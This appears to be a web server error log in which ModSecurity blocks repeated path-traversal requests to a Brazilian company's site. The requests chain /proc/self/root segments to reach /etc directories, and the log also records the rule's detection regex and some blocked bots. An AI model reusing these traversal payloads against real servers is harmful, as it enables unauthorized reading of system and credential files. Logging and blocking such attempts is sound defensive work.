[unique_id "abrawcdf6f5d65gmYZT2mgAAAsU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:02:57.569973 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.243.128:34044] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abraweoXxyEfFpUF8f-R6gAAAVY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:02:59.053834 2026] [:error] [pid 30077:tid 140411741927168] [client 74.7.241.31:48124] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abraw_u8EFLIOrSqIpsj5gAAAkA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:02:59.119060 2026] [:error] [pid 31803:tid 140411716749056] [client 74.7.243.128:34058] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abraw-yqAr6etmhZHNrpMQAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:03:00.389615 2026] [:error] [pid 29882:tid 140411641214720] [client 74.7.241.31:48140] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abraxEzinOy1jxa1j4c6XwAAAQw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:03:08.281672 2026] [:error] [pid 17653:tid 140411666392832] [client 74.7.243.128:52940] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrazMdf6f5d65gmYZT2sgAAAsk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 14:03:14.222287 2026] [:error] [pid 17653:tid 140411624429312] [client 74.7.241.31:48144] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abra0sdf6f5d65gmYZT2ugAAAs4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:03:36.982263 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.241.31:58264] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abra6OoXxyEfFpUF8f-SDAAAAUU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:03:42.055169 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.241.31:38198] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abra7uoXxyEfFpUF8f-SEwAAAU0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:03:58.032652 2026] [:error] [pid 17653:tid 140411666392832] [client 74.7.243.128:41982] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abra_sdf6f5d65gmYZT27wAAAsk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:04:04.884266 2026] [:error] [pid 29882:tid 140411658000128] [client 74.7.243.128:46590] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrbBEzinOy1jxa1j4c6kgAAAQo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:04:17.759208 2026] [:error] [pid 30077:tid 140411666392832] [client 74.7.228.61:42964] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrbEfu8EFLIOrSqIpskDQAAAkk"]
[Wed Mar 18 14:04:18.589569 2026] [:error] [pid 29882:tid 140411565680384] [client 74.7.244.43:34538] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrbEkzinOy1jxa1j4c6pAAAARU"]
[Wed Mar 18 14:04:27.731486 2026] [:error] [pid 17887:tid 140411582465792] [client 74.7.243.128:54916] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrbGwkwaGbbGflqUZAzAAAAANM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:04:33.272176 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.243.128:55474] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrbIeoXxyEfFpUF8f-SPwAAAVE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:04:38.851595 2026] [mime_magic:error] [pid 30077:tid 140411658000128] (70014)End of file found: [client 216.73.216.191:38530] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 14:04:43.418329 2026] [:error] [pid 11816:tid 140411708356352] [client 74.7.243.128:45636] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrbK-w_le52K8_3pV3_PQAAAgQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:04:49.166084 2026] [:error] [pid 14269:tid 140411683178240] [client 74.7.243.128:51096] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrbMQbLMZ6AikZjR9XhrQAAAAc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:04:55.586590 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.243.128:51392] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrbN-oXxyEfFpUF8f-STwAAAU4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:05:15.422195 2026] [:error] [pid 29882:tid 140411708356352] [client 74.7.243.128:51396] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrbS0zinOy1jxa1j4c6_AAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:05:46.427769 2026] [:error] [pid 15826:tid 140411708356352] [client 74.7.243.128:51994] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrbaeoXxyEfFpUF8f-SjQAAAUQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:06:07.375808 2026] [mime_magic:error] [pid 15051:tid 140411574073088] (70014)End of file found: [client 57.141.18.25:41142] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 14:06:09.164406 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.243.128:35944] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrbgeoXxyEfFpUF8f-SqwAAAUE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:06:12.628676 2026] [:error] [pid 30077:tid 140411641214720] [client 74.7.243.128:47244] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrbhPu8EFLIOrSqIpskNAAAAkw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:06:19.598884 2026] [:error] [pid 17887:tid 140411666392832] [client 74.7.243.128:47246] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrbiwkwaGbbGflqUZAzSAAAAMk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
